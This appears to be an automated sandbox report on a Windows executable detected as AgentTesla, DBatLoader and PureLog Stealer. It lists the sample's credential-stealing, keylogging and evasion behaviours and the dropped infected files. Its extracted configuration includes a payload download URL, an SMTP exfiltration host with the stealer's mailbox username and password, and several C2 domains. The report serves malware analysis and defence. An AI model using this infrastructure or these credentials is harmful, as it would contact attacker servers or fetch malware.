Windows Analysis Report
C6dAUcOA6M.exe

Overview

General Information

Sample name: C6dAUcOA6M.exe
renamed because original name is a hash value
Original sample name: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
Analysis ID: 1562865
MD5: 53f0663219e6091cecd600c59389711f
SHA1: f1986a61c2cb0107444fbd3e8075a25e21fb26ca
SHA256: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
Tags: doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Avira: detection malicious, Label: W32/Infector.Gen
Found malware configuration
Source: C6dAUcOA6M.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
Source: Native_neworigin.exe.7892.40.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Multi AV Scanner detection for domain / URL
Source: deoci.biz Virustotal: Detection: 14% Perma Link
Source: nqwjmb.biz Virustotal: Detection: 13% Perma Link
Source: wllvnzb.biz Virustotal: Detection: 13% Perma Link
Source: dwrqljrr.biz Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: C6dAUcOA6M.exe ReversingLabs: Detection: 63%
Source: C6dAUcOA6M.exe Virustotal: Detection: 62% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: C6dAUcOA6M.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: C6dAUcOA6M.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49826 version: TLS 1.2
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: aymtmquJ.pif, 0000000B.00000003.1450910858.000000001BE00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
